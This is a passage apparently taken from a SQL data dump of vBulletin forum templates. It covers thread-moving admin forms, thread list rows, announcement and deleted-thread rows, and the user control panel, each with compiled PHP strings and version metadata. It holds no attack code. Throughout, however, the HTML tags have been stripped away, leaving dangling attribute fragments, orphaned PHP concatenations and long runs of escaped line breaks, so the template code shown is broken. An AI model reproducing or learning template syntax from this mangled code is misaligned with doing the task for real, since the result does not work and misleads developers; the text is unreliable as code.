    \" . construct_phrase(\"$vbphrase[moving_x_posts_from_y_threads_in_z_forums]\", \"$postcount\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_posts]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_posts_to_new_thread]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_posts_to_existing_thread]\r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    $vbphrase[move_posts_note]
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n
    \r\n
    $vbphrase[moving_x_posts_from_y_threads_in_z_forums]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875714, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1666, -1, 'threadadmin_movethread', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    \".(($show[\'move\']) ? (\"$vbphrase[move_thread]\") : (\"$vbphrase[copy_thread]\")).\"
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[new_subject]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[may_rename_thread]
    \r\n\r\n $vbphrase[new_subject]:
    \r\n options[\'titlemaxchars\'] . \"\\\" />\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[destination_forum]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[destination_forum]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \".(($show[\'move\']) ? (\"\r\n
    \r\n $vbphrase[redirect]\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n \\\"\\\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n $vbphrase[redirect_title]:
    \r\n \".(($prefix_options) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n\r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_thread]$vbphrase[copy_thread]
    $vbphrase[title]: $threadinfo[prefix_plain_html] $threadinfo[title]
    \r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[new_subject]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[may_rename_thread]
    \r\n\r\n $vbphrase[new_subject]:
    \r\n \r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[destination_forum]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[destination_forum]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[redirect]\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n \"\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n $vbphrase[redirect_title]:
    \r\n \r\n \r\n \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[move_thread]$vbphrase[copy_thread]\" accesskey=\"s\" />\r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875549, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1667, -1, 'threadadmin_movethreads', '
    \r\nsession->vars[\'sessionhash\'] . \"\\\" />\r\nuserinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_threads]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[destination_forum]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[destination_forum]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[redirect]\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n \\\"\\\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[moving_x_threads_from_y_forums]\", \"$threadcount\", \"$forumcount\") . \"
    \r\n
    $vbphrase[moving_moderated_and_soft_deleted_threads]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', '
    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    $vbphrase[move_threads]
    \r\n
    \r\n
    \r\n\r\n\r\n
    \r\n $vbphrase[destination_forum]\r\n\r\n
    \r\n\r\n
    \r\n $vbphrase[destination_forum]:
    \r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[redirect]\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n
    \r\n
    \r\n \"\" $vbphrase[expires_in]\r\n \r\n\r\n \r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n $vbphrase[notes]\r\n\r\n
    \r\n
    $vbphrase[moving_x_threads_from_y_forums]
    \r\n
    $vbphrase[moving_moderated_and_soft_deleted_threads]
    \r\n
    $vbphrase[you_must_have_the_required_permission]
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n \r\n
    \r\n
    \r\n\r\n
    ', 'template', 1208875535, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'), (1668, -1, 'threadadmin_postbit', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'children\']) ? (\"\r\n \r\n $vbphrase[child_posts]:\r\n [$vbphrase[select]]\r\n [$vbphrase[deselect]]\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n \r\n $post[postdate]\".((!$show[\'detailedtime\']) ? (\", $post[posttime]\") : (\"\")).\"\r\n \r\n session->vars[\'sessionurl\'] . \"u=$post[userid]\\\" target=\\\"_blank\\\">$post[username]\r\n
    \r\n
    $post[pagetext]
    \r\n
    \r\n', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
    \r\n \r\n \r\n $vbphrase[child_posts]:\r\n [$vbphrase[select]]\r\n [$vbphrase[deselect]]\r\n \r\n \r\n \r\n
    \r\n \r\n $post[postdate], $post[posttime]\r\n \r\n $post[username]\r\n
    \r\n
    $post[pagetext]
    \r\n
    \r\n', 'template', 1197524081, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1669, -1, 'threadbit', '\r\n \r\n $thread[openclose_editable]\r\n \\\"\".(($show[\'threadcount\'])\r\n \r\n \".(($show[\'threadicons\']) ? (\"\r\n \".(($show[\'threadicon\']) ? (\"\\\"$thread[threadicontitle]\\\"\") : (\" \")).\"\r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n $thread[title_editable]\r\n
    \r\n \".(($show[\'taglist\'] OR $show[\'moderated\'] OR $show[\'deletedthread\'] OR $show[\'paperclip\'] OR $show[\'subscribed\'] OR $show[\'sticky\'] OR $show[\'rexpires\']) ? (\"\r\n \r\n \".(($show[\'taglist\']) ? (\" \\\"$thread[taglist]\\\" \") : (\"\")).\"\r\n \".(($show[\'rexpires\']) ? (\" \\\"\" \") : (\"\")).\"\r\n \".(($show[\'moderated\']) ? (\" \\\"\" \") : (\"\")).\"\r\n \".(($show[\'deletedthread\']) ? (\" \\\"\" \") : (\"\")).\"\r\n \".(($show[\'paperclip\']) ? (\" \\\"\" \") : (\"\")).\"\r\n \".(($show[\'subscribed\']) ? (\" \\\"$vbphrase[you_are_subscribed_to_this_thread]\\\" \") : (\"\")).\"\r\n \".(($show[\'sticky\']) ? (\" \\\"$vbphrase[sticky_thread]\\\" \") : (\"\")).\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'gotonewpost\']) ? (\"session->vars[\'sessionurl\'] . \"goto=newpost&t=$thread[threadid]$thread[highlight]\\\" id=\\\"thread_gotonew_$thread[realthreadid]\\\">\\\"$vbphrase[go_to_first_new_post]\\\"\") : (\"\")).\"\r\n $thread[movedprefix]\r\n $thread[typeprefix]\r\n $thread[moderatedprefix]\r\n $thread[prefix_rich]\r\n session->vars[\'sessionurl\'] . \"t=$thread[threadid]$thread[highlight]\\\" id=\\\"thread_title_$thread[realthreadid]\\\"\".(($show[\'gotonewpost\']) ? (\" style=\\\"font-weight:bold\\\"\") : (\"\")).\">$thread[threadtitle]\r\n \".(($thread[\'pagenav\']) ? (\"$stylevar[dirmark](\\\"$vbphrase[multipage_thread]\\\" $thread[pagenav]\".(($show[pagenavmore]) ? (\" ... session->vars[\'sessionurl\'] . \"t=$thread[threadid]&page=$thread[totalpages]$thread[highlight]\\\">$vbphrase[last_page]\") : (\"\")).\")\") : (\"\")).\"\r\n
    \r\n\r\n \".(($show[\'rmanage\']) ? (\"\") : (\"\")).\"\r\n\r\n
    \r\n \".(($show[\'threadratings\'] AND $show[\'threadrating\']) ? (\"\\\"\"\") : (\"\")).\"\r\n \".(($show[\'guestuser\']) ? (\"\r\n $thread[postusername]\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"u=$thread[postuserid]\', \'_self\')\\\">$thread[postusername]\r\n \")).\"\r\n
    \r\n\r\n \".(($show[\'unsubscribe\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n \".(($show[\'threadmoved\']) ? (\"\r\n -\r\n \") : (\"\r\n \r\n
    \r\n $thread[lastpostdate] \".((!$show[\'detailedtime\']) ? (\"$thread[lastposttime]\") : (\"\")).\"
    \r\n \" . construct_phrase(\"$vbphrase[by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"find=lastposter&t=$thread[threadid]\", \"$thread[lastposter]\") . \" session->vars[\'sessionurl\'] . \"p=$thread[lastpostid]$thread[highlight]#post$thread[lastpostid]\\\">\\\"$vbphrase[go_to_last_post]\\\"\r\n
    \r\n \r\n \")).\"\r\n\r\n \".(($show[\'notificationtype\']) ? (\"\r\n
    \r\n \r\n
    \r\n \r\n \") : (\"\r\n \".(($show[\'threadmoved\']) ? (\"-\") : (\"$thread[replycount]\")).\"\r\n $thread[views]\r\n\r\n \".(($show[\'forumlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"f=$thread[forumid]\\\">$thread[forumtitle]\r\n \") : (\"\")).\"\r\n \")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n', '\r\n \r\n $thread[openclose_editable]\r\n \"<if$vbphrase[have_x_posts_in_thread_last_y]
    \" border=\"\" />\r\n \r\n \r\n \"$thread[threadicontitle]\" \r\n \r\n\r\n \r\n\r\n $thread[title_editable]\r\n
    \r\n \r\n \r\n \"$thread[taglist]\" \r\n \"<phrase$vbphrase[expires_on_x_y]\" /> \r\n \"<phrase$vbphrase[x_moderated_posts]\" /> \r\n \"<phrase$vbphrase[x_deleted_posts]\" /> \r\n \"<phrase$vbphrase[x_attachments]\" /> \r\n \"$vbphrase[you_are_subscribed_to_this_thread]\" \r\n \"$vbphrase[sticky_thread]\" \r\n \r\n \r\n \"$vbphrase[go_to_first_new_post]\"\r\n $thread[movedprefix]\r\n $thread[typeprefix]\r\n $thread[moderatedprefix]\r\n $thread[prefix_rich]\r\n style=\"font-weight:bold\">$thread[threadtitle]\r\n $stylevar[dirmark](\"$vbphrase[multipage_thread]\" $thread[pagenav] ... $vbphrase[last_page])\r\n
    \r\n\r\n \r\n\r\n
    \r\n \"<phrase$vbphrase[thread_rating_x_votes_y_average]\" />\r\n \r\n $thread[postusername]\r\n \r\n $thread[postusername]\r\n \r\n
    \r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n -\r\n \r\n $vbphrase[replies_x_views_y]\">\r\n
    \r\n $thread[lastpostdate] $thread[lastposttime]
    \r\n $vbphrase[by_x] \"$vbphrase[go_to_last_post]\"\r\n
    \r\n \r\n
    \r\n\r\n \r\n
    \r\n \r\n
    \r\n \r\n \r\n -$thread[replycount]\r\n $thread[views]\r\n\r\n \r\n $thread[forumtitle]\r\n \r\n
    \r\n\r\n \r\n alt2alt1\">\r\n disabled=\"disabled\" />\r\n \r\n \r\n', 'template', 1265297119, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1670, -1, 'threadbit_announcement', '\r\n \\\"$vbphrase[announcement]\\\"\r\n \r\n \r\n
    \r\n \".(($show[\'forumtitle\']) ? (\"session->vars[\'sessionurl\'] . \"f=$announcement[forumid]\\\">$announcement[forumtitle] \") : (\"\")).\"$announcement[postdate]\r\n \r\n session->vars[\'sessionurl\'] . \"u=$announcement[userid]\\\">$announcement[username]\r\n \".(($announcement[\'usertitle\'] != \'\') ? (\"($announcement[usertitle])\") : (\"\")).\"\r\n \r\n
    \r\n \r\n', '\r\n \"$vbphrase[announcement]\"\r\n \r\n
    \r\n $vbphrase[views]: $announcement[views] \"$vbphrase[view_announcement]\"\r\n $vbphrase[announcement]: $announcement[title]\r\n
    \r\n
    \r\n $announcement[forumtitle] $announcement[postdate]\r\n \r\n $announcement[username]\r\n ($announcement[usertitle])\r\n \r\n
    \r\n \r\n', 'template', 1179140698, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1671, -1, 'threadbit_deleted', '\r\n \\\"\\\"\r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \".(($show[\'threadicon\']) ? (\"\\\"$thread[threadicontitle]\\\"\") : (\" \")).\"\r\n \") : (\"\")).\"\r\n\r\n \r\n\r\n
    \r\n \".(($show[\'moderated\']) ? (\" \\\"\"\") : (\"\")).\"\r\n  \\\"\"\r\n \".(($show[\'viewthread\']) ? (\"session->vars[\'sessionurl\'] . \"t=$thread[threadid]\\\">$vbphrase[view]\") : (\"\")).\"\r\n $thread[typeprefix]\r\n $thread[prefix_rich]\r\n \".(($show[\'threadtitle\']) ? (\"$thread[threadtitle]\") : (\"\")).\"\r\n
    \r\n\r\n
    \r\n \".(($show[\'managethread\']) ? (\"session->vars[\'sessionurl\'] . \"do=editthread&t=$thread[threadid]\\\">$vbphrase[manage]\") : (\"\")).\"\r\n \".(($show[\'guestuser\']) ? (\"\r\n $thread[postusername]\r\n \") : (\"\r\n session->vars[\'sessionurl\'] . \"u=$thread[postuserid]\', \'_self\')\\\">$thread[postusername]\r\n \")).\"\r\n
    \r\n \r\n\r\n \r\n
    \" . construct_phrase(\"$vbphrase[thread_deleted_by_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$thread[del_userid]\", \"$thread[del_username]\") . \"
    \r\n \".(($show[\'deletereason\']) ? (\"\r\n
    $vbphrase[reason]: $thread[del_reason]
    \r\n \") : (\"\")).\"\r\n \r\n\r\n \".(($show[\'forumlink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"f=$thread[forumid]\\\">$thread[forumtitle]\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n', '\r\n \"\"\r\n\r\n \r\n \"$thread[threadicontitle]\" \r\n \r\n\r\n \r\n\r\n
    \r\n  \"<phrase$vbphrase[x_moderated_posts]\" />\r\n  \"<phrase$vbphrase[x_deleted_posts]\" />\r\n $vbphrase[view]\r\n $thread[typeprefix]\r\n $thread[prefix_rich]\r\n $thread[threadtitle]\r\n
    \r\n\r\n
    \r\n $vbphrase[manage]\r\n \r\n $thread[postusername]\r\n \r\n $thread[postusername]\r\n \r\n
    \r\n \r\n\r\n \r\n
    $vbphrase[thread_deleted_by_x]
    \r\n \r\n
    $vbphrase[reason]: $thread[del_reason]
    \r\n
    \r\n \r\n\r\n \r\n $thread[forumtitle]\r\n \r\n\r\n \r\n \r\n disabled=\"disabled\" />\r\n \r\n \r\n', 'template', 1189605879, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1672, -1, 'threadbit_lastvisit', '\r\n \".(($show[\'unread_posts\']) ? (\"$vbphrase[all_threads_below_here_unread]\") : (\"$vbphrase[all_threads_below_here]\")).\"\r\n', '\r\n $vbphrase[all_threads_below_here_unread]$vbphrase[all_threads_below_here]\r\n', 'template', 1149792167, 'vBulletin Solutions', '3.6.0 Beta 2', 'vbulletin'), (1673, -1, 'threadbit_pagelink', '$curpage', '&page=$curpage$address2\">$curpage', 'template', 1127742889, 'vBulletin Solutions', '3.5.0', 'vbulletin'), (1674, -1, 'USERCP', '$template_hook[usercp_main_pos1]\r\n\r\n\".(($show[\'pendingfriendrequests\'] OR $show[\'privatemessages\'] OR $show[\'newvisitormessages\'] OR $show[\'groupattention\'] OR $show[\'invitedgroups\'] OR $show[\'picture_comment_block\']) ? (\"\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\".(($show[\'privatemessages\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n $messagelistbits\r\n \".(($show[\'more_pms_link\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'newvisitormessages\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n $newvisitormessagebits\r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'pendingfriendrequests\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'groupattention\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'invitedgroups\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'picture_comment_block\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'picture_comment_unread\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'picture_comment_moderated\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n\") : (\"\")).\"\r\n
    $vbphrase[user_notifications]
    \r\n \\\"\\\"\r\n session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[new_private_messages]: ($numpms)\r\n
    session->vars[\'sessionurl_q\'] . \"\\\">$vbphrase[view_all_unread_private_messages]
    \r\n \\\"\\\"\r\n session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"&tab=visitor_messaging#visitor_messaging\\\">$vbphrase[new_visitor_messages]: ($newvisitormessages)\r\n
    \r\n \\\"\\\"\r\n session->vars[\'sessionurl\'] . \"do=buddylist\\\">$vbphrase[pending_friend_requests]: ($pendingfriendrequests)\r\n
    $pendingfriendstext
    session->vars[\'sessionurl\'] . \"do=buddylist\\\">$vbphrase[manage_your_friend_requests]
    \r\n \\\"\\\"\r\n $vbphrase[the_following_groups_need_attention]: ($groupsneedattention)\r\n
    $groupsawaitingtext
    session->vars[\'sessionurl\'] . \"do=requests\\\">$vbphrase[view_group_requests]
    \r\n \\\"\\\"\r\n $vbphrase[you_have_been_invited_to_the_following_groups]: (\" . $GLOBALS[\'vbulletin\']->userinfo[\'socgroupinvitecount\'] . \")\r\n
    $invitetext
    session->vars[\'sessionurl\'] . \"do=invitations\\\">$vbphrase[view_group_invitations]
    \r\n \\\"\\\"\r\n $vbphrase[pending_picture_comments]\r\n
    \r\n session->vars[\'sessionurl\'] . \"do=unread\\\">$vbphrase[view_unread_comments]\r\n \" . construct_phrase(\"$vbphrase[you_have_x_unread_picture_comments]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'pcunreadcount\'] . \"\") . \"\r\n
    \r\n session->vars[\'sessionurl\'] . \"do=moderated\\\">$vbphrase[view_comments_awaiting_approval]\r\n \" . construct_phrase(\"$vbphrase[you_have_x_picture_comments_awaiting_approval]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'pcmoderatedcount\'] . \"\") . \"\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos2]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \".(($show[\'threads\']) ? (\"\r\n \r\n\r\n \".(($show[\'threadicons\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n\r\n \r\n \r\n \r\n \r\n \r\n $threadbits\r\n \") : (\"\r\n \r\n \r\n \r\n \")).\"\r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[new_subscribed_threads]: ($numthreads)\r\n
      $vbphrase[thread] / $vbphrase[thread_starter]$vbphrase[last_post]$vbphrase[replies]$vbphrase[views]
    $vbphrase[no_subscribed_threads_to_display]
    \r\n session->vars[\'sessionurl\'] . \"do=viewsubscription&folderid=all\\\">$vbphrase[view_all_subscribed_threads]\r\n
    \r\n
    \r\n\r\n\r\n$template_hook[usercp_main_pos3]\r\n\r\n\".(($show[\'forums\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n $forumbits\r\n\r\n
    options[\'showmoderatorcolumn\']) ? (\"6\") : (\"5\")).\"\\\">\r\n \\\"\\\"\r\n $vbphrase[subscribed_forums]\r\n
     $vbphrase[forum]$vbphrase[last_post]$vbphrase[threads]$vbphrase[posts]$vbphrase[moderator]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'socialgroups\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $grouplist\r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[subscribed_social_groups] : ($numsocialgroups)\r\n
    \r\n $vbphrase[group_name]\r\n \r\n $vbphrase[group_content]\r\n \r\n $vbphrase[last_post]\r\n
    \r\n
    \r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'discussions\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\".((!$numdiscussions) ? (\"\r\n \r\n \r\n \r\n\") : (\"\r\n \r\n \r\n \r\n \r\n \r\n $messagebits\r\n\")).\"\r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \\\"\\\"\r\n $vbphrase[new_subscribed_discussions] : ($numdiscussions)\r\n
    \r\n $vbphrase[no_subscribed_discussions_to_display]\r\n
    \r\n $vbphrase[discussion]\r\n $vbphrase[group_created]\r\n \r\n $vbphrase[messages]\r\n \r\n $vbphrase[last_post]\r\n
    \r\n session->vars[\'sessionurl\'] . \"\\\">$vbphrase[view_all_subscribed_discussions]\r\n
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos4]\r\n\r\n\".(($show[\'infractions\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $infractionbits\r\n\r\n
    \r\n \r\n \" . construct_phrase(\"$vbphrase[x_points_total]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'ipoints\'] . \"\") . \"\r\n    \r\n \\\"\\\"\r\n \r\n $vbphrase[latest_infractions_received]\r\n
     $vbphrase[post]$vbphrase[date]$vbphrase[expires]$vbphrase[points]$vbphrase[reason]$vbphrase[posted_by]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos5]\r\n\r\n\".(($show[\'reputation\']) ? (\"\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showuserraters\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n $reputationcommentbits\r\n\r\n
    \r\n \r\n \" . construct_phrase(\"$vbphrase[x_points_total]\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'reputation\'] . \"\") . \"\r\n    \r\n \\\"\\\"\r\n \r\n $vbphrase[latest_reputation_received]\r\n
     $vbphrase[thread]$vbphrase[date]$vbphrase[posted_by]$vbphrase[comment]
    \r\n
    \r\n\r\n\") : (\"\")).\"\r\n\r\n$template_hook[usercp_main_pos6]\r\n\r\n\r\n\r\n \r\n \r\n\r\n
     $forumjump
    ', '$template_hook[usercp_main_pos1]\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $messagelistbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $newvisitormessagebits\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    $vbphrase[user_notifications]
    \r\n \"\"\r\n $vbphrase[new_private_messages]: ($numpms)\r\n
    $vbphrase[view_all_unread_private_messages]
    \r\n \"\"\r\n $vbphrase[new_visitor_messages]: ($newvisitormessages)\r\n
    \r\n \"\"\r\n $vbphrase[pending_friend_requests]: ($pendingfriendrequests)\r\n
    $pendingfriendstext
    $vbphrase[manage_your_friend_requests]
    \r\n \"\"\r\n $vbphrase[the_following_groups_need_attention]: ($groupsneedattention)\r\n
    $groupsawaitingtext
    $vbphrase[view_group_requests]
    \r\n \"\"\r\n $vbphrase[you_have_been_invited_to_the_following_groups]: ($bbuserinfo[socgroupinvitecount])\r\n
    $invitetext
    $vbphrase[view_group_invitations]
    \r\n \"\"\r\n $vbphrase[pending_picture_comments]\r\n
    \r\n $vbphrase[view_unread_comments]\r\n $vbphrase[you_have_x_unread_picture_comments]\r\n
    \r\n $vbphrase[view_comments_awaiting_approval]\r\n $vbphrase[you_have_x_picture_comments_awaiting_approval]\r\n
    \r\n
    \r\n
    \r\n\r\n$template_hook[usercp_main_pos2]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n $threadbits\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[new_subscribed_threads]: ($numthreads)\r\n
      $vbphrase[thread] / $vbphrase[thread_starter]$vbphrase[last_post]$vbphrase[replies]$vbphrase[views]
    $vbphrase[no_subscribed_threads_to_display]
    \r\n $vbphrase[view_all_subscribed_threads]\r\n
    \r\n
    \r\n\r\n\r\n$template_hook[usercp_main_pos3]\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $forumbits\r\n\r\n
    65\">\r\n \"\"\r\n $vbphrase[subscribed_forums]\r\n
     $vbphrase[forum]$vbphrase[last_post]$vbphrase[threads]$vbphrase[posts]$vbphrase[moderator]
    \r\n
    \r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $grouplist\r\n\r\n
    65\">\r\n \"\"\r\n $vbphrase[subscribed_social_groups] : ($numsocialgroups)\r\n
    \r\n $vbphrase[group_name]\r\n \r\n $vbphrase[group_content]\r\n \r\n $vbphrase[last_post]\r\n
    \r\n
    \r\n\r\n\r\n
    \r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n $messagebits\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
    \r\n \"\"\r\n $vbphrase[new_subscribed_discussions] : ($numdiscussions)\r\n
    \r\n $vbphrase[no_subscribed_discussions_to_display]\r\n
    \r\n $vbphrase[discussion]\r\n $vbphrase[group_created]\r\n \r\n $vbphrase[messages]\r\n \r\n $vbphrase[last_post]\r\n
    \r\n $vbphrase[view_all_subscribed_discussions]\r\n
    \r\n
    \r\n\r\n
